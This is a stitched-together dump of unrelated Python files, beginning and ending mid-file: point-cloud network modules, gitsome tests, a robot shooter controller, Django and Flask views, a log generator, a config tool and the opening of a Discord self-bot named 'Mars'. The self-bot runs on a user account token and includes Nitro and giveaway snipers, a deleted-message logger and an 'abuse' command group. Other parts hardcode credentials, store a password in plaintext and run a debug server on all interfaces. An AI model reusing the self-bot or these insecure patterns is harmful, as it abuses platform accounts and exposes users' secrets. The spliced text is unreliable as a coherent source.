confidence = F.softmax(attw * self.temperature, dim=2) x_out = x_out * confidence x_out = x_out.sum(-1) confidence = confidence.squeeze() else: raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!") return F.normalize(x_out, p=2, dim=1), F.normalize(out_feat, p=2, dim=1) class InvOutBlockMVD(nn.Module): def __init__(self, params, norm=None): super(InvOutBlockMVD, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] c_out = mlp[-1] na = params['kanchor'] # Attention layer self.temperature = params['temperature'] self.attention_layer = nn.Sequential(nn.Conv2d(c_in, c_in, 1), \ nn.ReLU(inplace=True), \ nn.Conv2d(c_in,c_in,1)) if 'pooling' not in params.keys(): self.pooling_method = 'max' else: self.pooling_method = params['pooling'] self.pointnet = sptk.PointnetSO3Conv(c_in,c_out,na) def forward(self, x): # nb, nc, np, na -> nb, nc, na # attention first nb, nc, np, na = x.feats.shape attn = self.attention_layer(x.feats) attn = F.softmax(attn, dim=3) # nb, nc, np, 1 x_out = (x.feats * attn).sum(-1, keepdim=True) x_in = sptk.SphericalPointCloud(x.xyz, x_out, None) # nb, nc x_out = self.pointnet(x_in).view(nb, -1) return F.normalize(x_out, p=2, dim=1), attn # outblock for rotation regression model class SO3OutBlockR(nn.Module): def __init__(self, params, norm=None): super(SO3OutBlockR, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] self.linear = nn.ModuleList() self.temperature = params['temperature'] self.representation = params['representation'] self.attention_layer = nn.Conv2d(mlp[-1], 1, (1,1)) # out channel equals 4 for quaternion representation, 6 for ortho representation self.regressor_layer = nn.Conv2d(mlp[-1],4,(1,1)) # ------------------ uniary conv ---------------- for c in mlp: self.linear.append(nn.Conv2d(c_in, c, 1)) # self.norm.append(nn.BatchNorm2d(c)) c_in = c def forward(self, feats): x_out = feats end = len(self.linear) for lid, linear in enumerate(self.linear): # norm = self.norm[norm_cnt] x_out = linear(x_out) x_out = F.relu(x_out) # mean pool at xyz -> BxCxA x_out = x_out.mean(2) # attention weight attention_wts = self.attention_layer(x_out) # Bx1XA confidence = F.softmax(attention_wts * self.temperature, dim=2).view(x_out.shape[0], x_out.shape[2]) # regressor y = self.regressor_layer(x_out) # Bx6xA return confidence, y # outblock for relative rotation regression class RelSO3OutBlockR(nn.Module): def __init__(self, params, norm=None): super(RelSO3OutBlockR, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] na = params['kanchor'] self.pointnet = sptk.PointnetSO3Conv(c_in, c_in, na) c_in = c_in * 2 self.linear = nn.ModuleList() self.temperature = params['temperature'] rp = params['representation'] if rp == 'quat': self.out_channel = 4 elif rp == 'ortho6d': self.out_channel = 6 else: raise KeyError("Unrecognized representation of rotation: %s"%rp) self.attention_layer = nn.Conv2d(mlp[-1], 1, (1,1)) # out channel equals 4 for quaternion representation, 6 for ortho representation self.regressor_layer = nn.Conv2d(mlp[-1],self.out_channel,(1,1)) # ------------------ uniary conv ---------------- for c in mlp: self.linear.append(nn.Conv2d(c_in, c, (1,1))) c_in = c def forward(self, f1, f2, x1, x2): # nb, nc, np, na -> nb, nc, na sp1 = sptk.SphericalPointCloud(x1, f1, None) sp2 = sptk.SphericalPointCloud(x2, f2, None) f1 = self._pooling(sp1) f2 = self._pooling(sp2) nb = f1.shape[0] na = f1.shape[2] # expand and concat into metric space (nb, nc*2, na_tgt, na_src) f2_expand = f2.unsqueeze(-1).expand(-1,-1,-1,na).contiguous() f1_expand = f1.unsqueeze(-2).expand(-1,-1,na,-1).contiguous() x_out = torch.cat((f1_expand,f2_expand),1) # fc layers with relu for linear in self.linear: x_out = linear(x_out) x_out = F.relu(x_out) attention_wts = self.attention_layer(x_out).view(nb, na, na) confidence = F.softmax(attention_wts * self.temperature, dim=1) y = self.regressor_layer(x_out) # return: [nb, na, na], [nb, n_out, na, na] return confidence, y def _pooling(self, x): # [nb, nc, na] x_out = self.pointnet(x) x_out = F.relu(x_out) return x_out
# -*- coding: utf-8 -*- # Copyright 2015 Donne Martin. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. from __future__ import unicode_literals from __future__ import print_function import mock from compat import unittest from gitsome.github import GitHub from tests.mock_feed_parser import MockFeedParser from tests.mock_github_api import MockGitHubApi from tests.mock_pretty_date_time import pretty_date_time from tests.data.email import formatted_emails from tests.data.emoji import formatted_emojis from tests.data.events import formatted_events from tests.data.user import formatted_org, formatted_user, formatted_users from tests.data.gitignores import formatted_gitignores, formatted_gitignores_tip from tests.data.issue import formatted_issues, formatted_pull_requests from tests.data.license import formatted_licenses, formatted_licenses_tip from tests.data.thread import formatted_threads from tests.data.trends import formatted_trends from tests.data.user_feed import formatted_user_feed class GitHubTest(unittest.TestCase): def setUp(self): self.github = GitHub() self.github.config.api = MockGitHubApi() self.github.formatter.pretty_dt = pretty_date_time self.github.trend_parser = MockFeedParser() def test_avatar_no_pil(self): avatar_text = self.github.avatar( 'https://avatars.githubusercontent.com/u/583231?v=3', False) assert avatar_text == 'PIL not found.\n' @mock.patch('gitsome.github.click.secho') def test_create_comment(self, mock_click_secho): self.github.create_comment('user1/repo1/1', 'text') mock_click_secho.assert_called_with( 'Created comment: text', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_create_comment_invalid_args(self, mock_click_secho): self.github.create_comment('invalid/repo1/1', 'text') mock_click_secho.assert_called_with( 'Error creating comment', fg=self.github.config.clr_error) self.github.create_comment('user1/repo1/foo', 'text') mock_click_secho.assert_called_with( 'Expected argument: user/repo/# and option -t "comment".', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_create_issue(self, mock_click_secho): self.github.create_issue('user1/repo1', 'title', 'desc') mock_click_secho.assert_called_with( 'Created issue: title\ndesc', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_create_issue_no_desc(self, mock_click_secho): self.github.create_issue('user1/repo1', 'title', issue_desc=None) mock_click_secho.assert_called_with( 'Created issue: title\n', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_create_issue_invalid_args(self, mock_click_secho): self.github.create_issue('invalid/repo1', 'title', 'desc') mock_click_secho.assert_called_with( 'Error creating issue.', fg=self.github.config.clr_error) self.github.create_issue('u', 'title', 'desc') mock_click_secho.assert_called_with( 'Expected argument: user/repo and option -t "title".', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_create_repo(self, mock_click_secho): self.github.create_repo('name', 'desc', True) mock_click_secho.assert_called_with( 'Created repo: name\ndesc', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_create_repo_no_desc(self, mock_click_secho): self.github.create_repo('name', repo_desc=None) mock_click_secho.assert_called_with( 'Created repo: name\n', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_create_repo_invalid_args(self, mock_click_secho): self.github.create_repo('repo1', 'desc', True) mock_click_secho.assert_called_with( 'Error creating repo: foobar', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_emails(self, mock_click_secho): self.github.emails() mock_click_secho.assert_called_with(formatted_emails) @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.config.Config.prompt_news_feed') def test_feed_config(self, mock_config_prompt_news_feed, mock_click_secho): self.github.feed() mock_config_prompt_news_feed.assert_called_with() @mock.patch('gitsome.github.click.secho') def test_feed(self, mock_click_secho): self.github.config.user_feed = 'user_feed' self.github.feed() mock_click_secho.assert_called_with(formatted_user_feed) @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.config.Config') def test_feed_user(self, mock_config, mock_click_secho): self.github.feed('user1') mock_click_secho.assert_called_with(formatted_events) @mock.patch('gitsome.github.click.secho') def test_emojis(self, mock_click_secho): self.github.emojis() mock_click_secho.assert_called_with(formatted_emojis) @mock.patch('gitsome.github.click.secho') def test_followers(self, mock_click_secho): self.github.followers('foo') mock_click_secho.assert_called_with(formatted_users) @mock.patch('gitsome.github.click.secho') def test_following(self, mock_click_secho): self.github.following('foo') mock_click_secho.assert_called_with(formatted_users) @mock.patch('gitsome.github.click.secho') def test_gitignore_template(self, mock_click_secho): self.github.gitignore_template('valid_language') mock_click_secho.assert_called_with( 'template', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_gitignore_template_invalid(self, mock_click_secho): self.github.gitignore_template('invalid_language') mock_click_secho.assert_called_with( ('Invalid case-sensitive template requested, run the ' 'following command to see available templates:\n' ' gh gitignore-templates'), fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_gitignore_templates(self, mock_click_secho): self.github.gitignore_templates() mock_click_secho.assert_any_call(formatted_gitignores) mock_click_secho.assert_any_call(formatted_gitignores_tip, fg=self.github.config.clr_message) @mock.patch('gitsome.web_viewer.WebViewer.view_url') def test_issue(self, mock_view_url): self.github.issue('user1/repo1/1') mock_view_url.assert_called_with( 'https://github.com/user1/repo1/issues/1') @mock.patch('gitsome.github.click.secho') def test_issue_invalid_args(self, mock_click_secho): self.github.issue('user1/repo1/foo') mock_click_secho.assert_called_with( 'Expected argument: user/repo/#.', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_issues_setup(self, mock_click_secho): self.github.issues_setup() mock_click_secho.assert_called_with(formatted_issues) @mock.patch('gitsome.github.click.secho') def test_license(self, mock_click_secho): self.github.license('valid_license') mock_click_secho.assert_called_with( 'template', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_license_invalid(self, mock_click_secho): self.github.license('invalid_license') mock_click_secho.assert_called_with( (' Invalid case-sensitive license requested, run the ' 'following command to see available licenses:\n' ' gh licenses'), fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') def test_licenses(self, mock_click_secho): self.github.licenses() mock_click_secho.assert_any_call(formatted_licenses) mock_click_secho.assert_any_call(formatted_licenses_tip, fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_notifications(self, mock_click_secho): self.github.notifications() mock_click_secho.assert_called_with(formatted_threads) @mock.patch('gitsome.github.click.secho') def test_octocat(self, mock_click_secho): self.github.octocat('foo\\nbar') mock_click_secho.assert_called_with( 'foo\nbar', fg=self.github.config.clr_message) @mock.patch('gitsome.github.click.secho') def test_pull_requests(self, mock_click_secho): self.github.pull_requests() mock_click_secho.assert_called_with(formatted_pull_requests) @mock.patch('gitsome.github.click.secho') def test_rate_limit(self, mock_click_secho): self.github.rate_limit() mock_click_secho.assert_called_with( 'Rate limit: 5000', fg=self.github.config.clr_message) @mock.patch('gitsome.web_viewer.WebViewer.view_url') def test_repository(self, mock_view_url): self.github.repository('user1/repo1') mock_view_url.assert_called_with( 'https://github.com/user1/repo1') @mock.patch('gitsome.github.click.secho') def test_repository_invalid(self, mock_click_secho): self.github.repository('user1/repo1/1') mock_click_secho.assert_called_with( 'Expected argument: user/repo.', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.GitHub.issues') def test_search_issues(self, mock_github_issues, mock_click_secho): self.github.search_issues('foo') mock_github_issues.assert_called_with( ['foobar', 'foobar', 'foobar'], 1000, False, sort=False) @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.GitHub.repositories') def test_search_repos(self, mock_github_repositories, mock_click_secho): self.github.search_repositories('foo', 'stars') mock_github_repositories.assert_called_with( ['foobar'], 1000, False, sort=False) @mock.patch('gitsome.github.click.secho') def test_trending(self, mock_click_secho): self.github.trending('Python', False, False, False) mock_click_secho.assert_called_with(formatted_trends) @mock.patch('gitsome.github.click.secho') def test_user(self, mock_click_secho): self.github.user('user1') mock_click_secho.assert_called_with(formatted_user) self.github.user('user2') mock_click_secho.assert_called_with(formatted_org) @mock.patch('gitsome.github.click.secho') def test_user_invalid(self, mock_click_secho): self.github.user('invalid_user') mock_click_secho.assert_called_with( 'Invalid user.', fg=self.github.config.clr_error) @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.webbrowser.open') def test_user_browser(self, mock_webbrowser_open, mock_click_secho): self.github.user('invalid_user', browser=True) mock_webbrowser_open.assert_called_with( 'https://github.com/invalid_user') @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.webbrowser.open') def test_view_browser(self, mock_webbrowser_open, mock_click_secho): self.github.config.load_urls = lambda x: ['user1/foo'] self.github.view(1, view_in_browser=True) mock_webbrowser_open.assert_called_with( 'https://github.com/user1/foo') @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.GitHub.issue') def test_view_issue(self, mock_github_issue, mock_click_secho): self.github.config.load_urls = lambda x: ['user1/foo/issues/1'] self.github.view(0) mock_github_issue.assert_called_with('user1/foo/1') @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.github.GitHub.repository') def test_view_repo(self, mock_github_repository, mock_click_secho): self.github.config.load_urls = lambda x: ['user1/foo'] self.github.view(0) mock_github_repository.assert_called_with('user1/foo') @mock.patch('gitsome.github.click.secho') @mock.patch('gitsome.web_viewer.WebViewer.view_url') def test_view_user(self, mock_view_url, mock_click_secho): self.github.config.load_urls = lambda x: ['user1'] self.github.view(0) mock_view_url.assert_called_with('https://github.com/user1') def test_base_url(self): self.github.config.enterprise_url = 'https://github.intra.example.com' assert self.github.base_url == 'https://github.intra.example.com' self.github.config.enterprise_url = None assert self.github.base_url == self.github._base_url def test_add_base_url(self): expected = self.github.base_url + 'foo.html' assert self.github.add_base_url('foo.html') == expected assert self.github.add_base_url(expected) == expected
from ._co2tab import co2tab from ._export import export from ._extract import extract from ._merge import merge from ._save2incon import save2incon __all__ = [ "co2tab", "export", "extract", "merge", "save2incon", ]
import wpilib from wpilib import controller import ctre from numpy import interp from magicbot import feedback, tunable class Shooter: outer_motor: ctre.WPI_TalonFX centre_motor: ctre.WPI_TalonFX loading_piston: wpilib.Solenoid ranges = (0, 7, 8, 9, 10, 11) # TODO remove 0 and add more data points centre_rpms = (0, 880, 1120, 1500, 2150, 2400) outer_rpms = (5000, 5000, 5000, 5000, 5000, 5000) outer_target = tunable(0) centre_target = tunable(0) COUNTS_PER_REV = 2048 RPS_TO_CTRE_UNITS = COUNTS_PER_REV / 10 # counts per 100ms CTRE_UNITS_TO_RPS = 1 / RPS_TO_CTRE_UNITS def __init__(self): self.inject = False self.in_range = False self.velocity_tolerance = 0.05 # of setpoint def on_enable(self) -> None: self.centre_motor.stopMotor() self.outer_motor.stopMotor() def setup(self) -> None: self.loading_piston.setPulseDuration(0.5) self.outer_motor.setInverted(True) self.centre_motor.setInverted(False) self.outer_motor.setNeutralMode(ctre.NeutralMode.Coast) self.centre_motor.setNeutralMode(ctre.NeutralMode.Coast) self.outer_motor.config_kP(0, 0.00394 * self.RPS_TO_CTRE_UNITS / 10) self.outer_motor.config_kI(0, 0) self.outer_motor.config_kD(0, 0) self.outer_motor.config_kF(0, 0) self.outer_ff_calculator = controller.SimpleMotorFeedforward(kS=0.187, kV=0.11) self.centre_motor.config_kP(0, 0.0042 * self.RPS_TO_CTRE_UNITS / 10) self.centre_motor.config_kI(0, 0) self.centre_motor.config_kD(0, 0) self.centre_motor.config_kF(0, 0) self.centre_ff_calculator = controller.SimpleMotorFeedforward(kS=0.158, kV=0.11) def execute(self) -> None: voltage = wpilib.RobotController.getInputVoltage() centre_feed_forward = ( self.centre_ff_calculator.calculate(self.centre_target) / voltage ) outer_feed_forward = ( self.outer_ff_calculator.calculate(self.outer_target) / voltage ) self.centre_motor.set( ctre.ControlMode.Velocity, self.centre_target * self.RPS_TO_CTRE_UNITS, ctre.DemandType.ArbitraryFeedForward, centre_feed_forward, ) self.outer_motor.set( ctre.ControlMode.Velocity, self.outer_target * self.RPS_TO_CTRE_UNITS, ctre.DemandType.ArbitraryFeedForward, outer_feed_forward, ) if self.inject: self.loading_piston.startPulse() self.inject = False def set_range(self, dist: float) -> None: """ Set the target range for the shooter, this will be converted into target speeds for the flywheels dist: planar distance from the power port """ if self.ranges[0] <= dist <= self.ranges[-1]: self.in_range = True else: # clamp the range between our minimum and maximum dist = min(self.ranges[-1], max(dist, self.ranges[0])) self.in_range = False self.centre_target = interp(dist, self.ranges, self.centre_rpms) self.outer_target = interp(dist, self.ranges, self.outer_rpms) @feedback def is_at_speed(self) -> bool: """ Returns true if the shooter is spinning at the set speed. Considers the rotation rates of the flywheels compared with their setpoints """ return ( abs(self.centre_target - self.get_centre_velocity()) <= self.centre_target * self.velocity_tolerance and abs(self.outer_target - self.get_outer_velocity()) <= self.outer_target * self.velocity_tolerance ) @feedback def get_centre_velocity(self): """Returns velocity in rps""" return self.centre_motor.getSelectedSensorVelocity() * self.CTRE_UNITS_TO_RPS @feedback def get_outer_velocity(self): """Returns velocity in rps""" return self.outer_motor.getSelectedSensorVelocity() * self.CTRE_UNITS_TO_RPS @feedback def is_firing(self) -> bool: """ Returns true if the shooter is attempting a shot. based off of the pistons current state """ return self.loading_piston.get() @feedback def is_in_range(self) -> bool: """ Returns true if the current target of the shooter is within range Returns false if the range has been clamped """ return self.in_range @feedback def is_ready(self) -> bool: """ Returns true if the shooter is ready to take a shot. Checks the speed, range and whether the piston is moving """ # print(f"in range {self.is_in_range()} at speed {self.is_at_speed()} is firing {self.is_firing()}") return self.is_in_range() and self.is_at_speed() and not self.is_firing() def fire(self) -> None: """ Inject a ball into the shooter """ self.inject = True
from djgeojson.serializers import Serializer as GeoJSONSerializer from django.contrib.gis.measure import Distance, D from django.shortcuts import render_to_response from djgeojson.http import HttpJSONResponse from django.template import RequestContext from django.contrib.gis.geos import Point from models import PermitArea, PermitData from django.shortcuts import render from django.http import HttpResponse from collections import OrderedDict from itertools import chain import json def index(request): return render_to_response('permit_map/material.html', { 'centroid': PermitArea.objects.collect().centroid, 'bounds': list(PermitArea.objects.extent()) }, context_instance=RequestContext(request)) def search(request): '''Return the results of a full text search as JSON''' response = {} if 'q' in request.GET: query = request.GET['q'] if query: ids = PermitData.text.search(query).values_list('owner__id', flat=True) if len(ids) > 0: permits = PermitArea.objects.filter(id__in=list(ids)) bounds = permits.extent() else: permits = [] bounds = [] response['permits'] = [ p.to_dict() for p in permits ] response['bounds'] = list(bounds) # permits = PermitData.text.search(query) # full text search in one line! # # # Get list of match ids # ids = permits.values_list('owner__id', flat=True) # if len(ids) > 0: # bounds = PermitArea.objects.filter(id__in=ids).extent() # else: # bounds = [] # # # convert each matching Permit into a small_dict and convert to JSON. # response['permits'] = [ p.to_dict() for p in permits ] # response['bounds'] = list(bounds) return HttpResponse(json.dumps(response), content_type='application/json') def _decode_lat_lon(request): if 'lat' in request.GET and 'lon' in request.GET: lon = request.GET['lon'] lat = request.GET['lat'] if lat and lon: return Point(float(lon), float(lat)) return None def permitsat(request): '''Return all permits active at a specific lat/lng''' response = {} if 'lat' in request.GET and 'lon' in request.GET: lon = request.GET['lon'] lat = request.GET['lat'] if lat and lon: # GIS query asking for all Permits with a region that contains the requested point permits = PermitArea.objects.filter(region__contains=Point(float(lon), float(lat))) # convert each matching Permit into a small_dict and convert to JSON. response['permits'] = [ p.to_dict() for p in permits ] response['bounds'] = list(permits.extent()) return HttpResponse(json.dumps(response), content_type='application/json') def overview(request): '''Return basic information about the permit data that we have on file.''' permit_glom = PermitArea.objects.collect() # Decode the user's location (if available) and list everything in 3 miles centroid = _decode_lat_lon(request) #closest = [] bounds = [] if centroid is not None and permit_glom.envelope.contains(centroid): closest = PermitArea.objects.filter(region__distance_lt=(centroid, D(mi=1))).distance(centroid).order_by('distance') bounds = list(closest.extent()) dates = [] for o in PermitArea.objects.values('first_seen', 'last_seen').distinct(): dates.append(o['first_seen']) dates.append(o['last_seen']) dates = list(set(dates)) response = { 'categories': sorted(PermitArea.objects.values_list('category', flat=True).distinct()), 'towns': sorted(PermitArea.objects.values_list('township', flat=True).distinct()), 'closest': { #'permits': [ p.to_dict() for p in closest ], 'permits': [], # select none on overview 'bounds': bounds }, 'dates': [ d.isoformat() for d in sorted(dates) ], } return HttpResponse(json.dumps(response), content_type='application/json')
#! /usr/bin/env python # coding=utf-8 import sys sys.path.append('../common') import os.path from flask import Flask, redirect, url_for from flask_admin import Admin from flask_login import (current_user, UserMixin, LoginManager, login_user, logout_user) from flask_admin.contrib.sqla import ModelView from flask_admin.contrib.fileadmin import FileAdmin from flask_admin.base import MenuLink, BaseView, expose from ext import db from users import User as _User ''' pip install Flask-Admin ''' app = Flask(__name__, template_folder='./templates', static_folder='./static') app.config.from_object('config') USERNAME = 'xiaoming' db.init_app(app) login_manager = LoginManager() login_manager.init_app(app) class User(_User, UserMixin): pass @app.before_first_request def create_user(): db.drop_all() db.create_all() user = User(name=USERNAME, email='a@dongwm.com', password='123') db.session.add(user) db.session.commit() # 给LINK增加条件 class AuthenticatedMenuLink(MenuLink): def is_accessible(self): return current_user.is_authenticated class NotAuthenticatedMenuLink(MenuLink): def is_accessible(self): return not current_user.is_authenticated @login_manager.user_loader def user_loader(user_id): user = User.query.filter_by(id=user_id).first() return user class MyAdminView(BaseView): @expose('/') def index(self): return self.render('authenticated-admin.html') def is_accessible(self): # 判断是否登陆,没有登陆的话返回403 return current_user.is_authenticated @app.route('/') def index(): return '<a href="/admin/">Click me to get to Admin!</a>' @app.route('/login/') def login_view(): user = User.query.filter_by(name=USERNAME).first() login_user(user) return redirect(url_for('admin.index')) @app.route('/logout/') def logout_view(): logout_user() return redirect(url_for('admin.index')) admin = Admin(app, name='web_develop', template_mode='bootstrap3') admin.add_view(ModelView(User, db.session)) # 这样子默认生成的子路径为/admin/user,可以使用endpoint='new_user',这严重路线自定义为/admin/new_user path = os.path.join(os.path.dirname(__file__), './static') admin.add_view(FileAdmin(path, '/static/', name='Static Files')) # 创建一个名为Authenticated的链接,必须登陆才可以访问 admin.add_view(MyAdminView(name='Authenticated')) # 会创建叫做Links的下拉菜单 admin.add_link(MenuLink(name='Back Home', url='/')) admin.add_link(NotAuthenticatedMenuLink(name='Login', endpoint='login_view')) admin.add_link(MenuLink(name='Google', category='Links', url='http://www.google.com/')) admin.add_link(MenuLink(name='Github', category='Links', url='https://github.com/dongweiming')) admin.add_link(AuthenticatedMenuLink(name='Logout', endpoint='logout_view')) if __name__ == '__main__': app.run(host='0.0.0.0', port=8080, debug=True)
from enum import Enum class PerceivedDeviceType(Enum): Undefined = 0 DigitalStillCamera = 1
import time from datetime import datetime from random import choice, randint from pandas import DataFrame class Log: def __init__(self, cases, events, rows): self.cases = [i for i in range(cases)] self.events = [i for i in range(events)] self.case_data = [choice(self.cases) for i in range(rows)] self.event_data = [choice(self.events) for i in range(rows)] self.timestamp_data = [self.__rand_datetime__() for i in range(rows)] self.df = DataFrame({"Case": self.case_data, "Event": self.event_data, "Timestamp": self.timestamp_data}) self.df = self.df.sort_values(by="Case") def __rand_datetime__(self): rand_time = randint(round(time.time() - len(self.events) * 50 * len(self.cases)), round(time.time() + len(self.events) * 50 * len(self.cases))) return datetime.fromtimestamp(rand_time) def as_dataframe(self): return self.df def to_csv(self, path): self.df.to_csv(path, index=False) log = Log(200, 50, 5000) log.to_csv("c200-e50-r5000.csv")
import configparser import getpass import os from typing import Type, Generic, List, Dict, Set DEFAULT_HOSTNAME = "tristano.neuro.polymtl.ca" DEFAULT_PORT = "80" DEFAULT_CONFIGFILE = ".sctdbtool" def setup(arguments: Dict): """This method will ask user input to configure the system with the hostname, username, etc, for the web management access. :param arguments: the CLI arguments. """ print("Please enter the configuration below.") print("Press ENTER to accept default values (between brackets).\n") hostname = input("Hostname of the Web Management [{}]: ".format(DEFAULT_HOSTNAME)) hostname = hostname or DEFAULT_HOSTNAME port = input("Port of the Web Management [{}]: ".format(DEFAULT_PORT)) port = port or DEFAULT_PORT username = input("Username: ") password = getpass.getpass("Password: ") config = configparser.ConfigParser() config['Global'] = { 'hostname': hostname, 'port': int(port), 'username': username, 'password': password, } userdir = os.path.expanduser("~") config_path = os.path.join(userdir, DEFAULT_CONFIGFILE) with open(config_path, 'w') as configfile: config.write(configfile) print("Configuration saved successfully !") def read_setup(): """Read the system configuration file. :return: a dict with the configuration parameters. """ userdir = os.path.expanduser("~") config_path = os.path.join(userdir, DEFAULT_CONFIGFILE) if not os.path.exists(config_path): raise RuntimeError("Please run 'sct_dbtool setup' before.") config = configparser.ConfigParser() config.read(config_path) return config['Global']
# coding=utf8 connected = False print("Loading...") print("Loading imports...") import re import sys import os import io import json import time import socket import random import urllib import string import aiohttp import smtplib import discord import asyncio import requests import datetime import platform import threading import discord.guild import translators as ts from random import randint from itertools import cycle from colorama import Fore, init from discord.ext import commands from unshortenit import UnshortenIt from bs4 import BeautifulSoup as bs4 from discord.ext.commands import bot, CommandNotFound from discord_webhook import DiscordWebhook, DiscordEmbed from discord.utils import get print("Imports loaded.") with open('data/configurations/configsettings.json', 'r') as configsettings: configsettings = json.load(configsettings) config_name = (configsettings["config_name"]) # Config try: with open('data/configurations/' + config_name + '.json', 'r') as settings: config = json.load(settings) token = (config["token"]) color = (config["color"]) errorcolor = (config["error-color"]) prefix = (config["prefix"]) streamurl = (config["stream-url"]) deletetimer = (config["delete-timer"]) nitrosniper = (config["nitro-sniper"]) nitrosniperredeem = (config["nitro-redeem-token"]) giveawaysniper = (config["giveaway-sniper"]) giveawaysniperdelay = (config["giveaway-sniper-delay"]) deletedmessagelogger = (config["deleted-message-logger"]) gmailaccount = (config["gmail-account"]) gmailaccountpassword = (config["gmail-password"]) title = (config["title"]) helpcommandemoji = (config["emoji"]) helpimage = (config["help-image"]) helpthumbnail = (config["help-thumbnail"]) mainimage = (config["main-image"]) mainthumbnail = (config["main-thumbnail"]) accountimage = (config["account-image"]) accountthumbnail = (config["account-thumbnail"]) networkingimage = (config["networking-image"]) networkingthumbnail = (config["networking-thumbnail"]) funimage = (config["fun-image"]) funthumbnail = (config["fun-thumbnail"]) abuseimage = (config["abuse-image"]) abusethumbnail = (config["abuse-thumbnail"]) cringeimage = (config["cringe-image"]) cringethumbnail = (config["cringe-thumbnail"]) privateimage = (config["private-image"]) privatethumbnail = (config["private-thumbnail"]) commandwebhook = (config["webhook"]) helptextbold = (config["help-text-bold"]) except: print("There was an error loading this config, booting to default") time.sleep(3) with open("data/configurations/configsettings.json", "r") as f: config = json.load(f) config[str("config_name")] = "default" with open("data/configurations/configsettings.json", "w") as f: json.dump(config, f, indent=4) os.system("python3 Mars.py") # footer establishment footer = "Made by Flairings#0608" # name establishment name = "Mars" # Console color establishment consolecolor = Fore.LIGHTRED_EX # Colorama autoreset init(autoreset=True) # Time establishment t = time.localtime() current_time = time.strftime("%H:%M:%S", t) start_time = time.time() # export friends depend encoding = sys.stdout.encoding # Version establishment version = "2.8.6" # @bot.command amount establishment amountofcommands = 105 # Bot establishment bot = commands.Bot(description="Very cute self-bot | Made by Flairings#0608", command_prefix=prefix, self_bot=True) if nitrosniper == "true": if nitrosniperredeem == "": nitrosniperredeem = token else: headers = {'Content-Type': 'application/json', 'authorization': nitrosniperredeem} url = 'https://discordapp.com/api/v6/users/@me/library' re = requests.get(url, headers=headers) if re.status_code == 200: pass else: print("Nitro sniper redeem token is invalid.") exit(0) # login thing innit def login(): try: bot.run(token, bot=False) except discord.errors.LoginFailure as tokenerror: print(consolecolor + "Status: " + Fore.RED + "DISCONNECTED") connectionerrorprint("A fatal error has occurred, check your token") def restartbot(): os.system("python3 Mars.py") # Removes default help command bot.remove_command('help') # connection establishment connected = True # Boolean for user relationship logging logrelationships = True def eventprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.BLUE + "[Event]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[EVENT]', description=f"" f"{message}" f"", color=3778303) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def eventprintnowebhook(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.BLUE + "[Event]" + Fore.LIGHTWHITE_EX + " | " + message) def commandprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.YELLOW + "[Command]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[COMMAND]', description=f"" f"{message}" f"", color=16773456) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def errorprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.RED + "[Error]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[ERROR]', description=f"" f"{message}" f"", color=16727357) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def errorprintnowebhook(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.RED + "[Error]" + Fore.LIGHTWHITE_EX + " | " + message) def sniperprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.GREEN + "[Sniper]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[SNIPER]', description=f"" f"{message}" f"", color=917248) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def connectionerrorprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.RED + "[Connection Error]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[CONNECTION ERROR]', description=f"" f"{message}" f"", color=14221312) 